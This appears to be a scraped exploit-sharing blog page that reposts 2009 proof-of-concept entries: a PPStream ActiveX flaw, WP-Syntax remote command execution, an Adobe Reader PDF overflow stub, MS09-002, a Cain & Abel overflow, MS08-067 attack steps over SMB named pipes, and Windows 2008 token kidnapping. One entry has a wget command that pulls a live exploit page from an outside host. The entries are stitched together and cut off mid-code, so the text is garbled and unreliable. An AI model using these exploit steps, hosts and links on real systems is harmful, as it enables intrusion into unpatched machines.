<!–
******************************************************************************
PPStream is the largest p2p media player in the world.
There are two hundred million PPStream users in the world.
The vulnerability is exploitable, but I have no time to make it; you could visit my blog for detail.^@^
welcome to http://0dayexpose.blogspot.com/
COM Object – {D22DE742-04CD-4B5C-A8A3-82AB3DAEC43D} PPSMediaList Control
COM Object Filename : C:\PROGRA~1\PPStream\MList.ocx
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Company Name : PPStream Inc.
Version : V2.6.86.8900
Web Site : http://www.ppstream.com
*******************************************************************************
Tags: Activex, PoC, PPStream
============================================================
Wordpress Plugin WP-Syntax <= 0.9.1 Remote Command Execution
============================================================
Tags: Plugins, PoC, WordPress, WP-Syntax
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = "\x40\x00";
my $factor = "ABCD";
my $data = "A" x 8314;
Tags: 0day, Adobe, Adobe Acrobat Reader, PoC
causes an exception at 41414141
http://milw0rm.com/sploits/2009-41414141.pdf
# milw0rm.com [2009-02-23]
Tags: PDF, PoC
<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"
took a little but found it. /str0ke
-->
Tags: IE7, MS09-002, PoC
# exploit.py
##########################################################
# Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC
# (other versions may also be affected)
# By:Encrypt3d.M!nd
# encrypt3d.blogspot.com
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder
##########################################################
#
Tags: Cain, PoC
In vstudio command prompt:
mk.bat
next:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/…)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
Tags: MS08-067, PoC
Guizai's note: I previously posted the MS Windows 2003 Token Kidnapping Local Exploit PoC; this time it is 2008.
Now it’s time for Windows 2008 exploit (it should work on Windows 2003 too)
You will see that the super secure IIS 7 can be owned, too weak by default :)
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco2.zip
Enjoy.
Tags: Exploit, PoC, Token Kidnapping, Windows 2008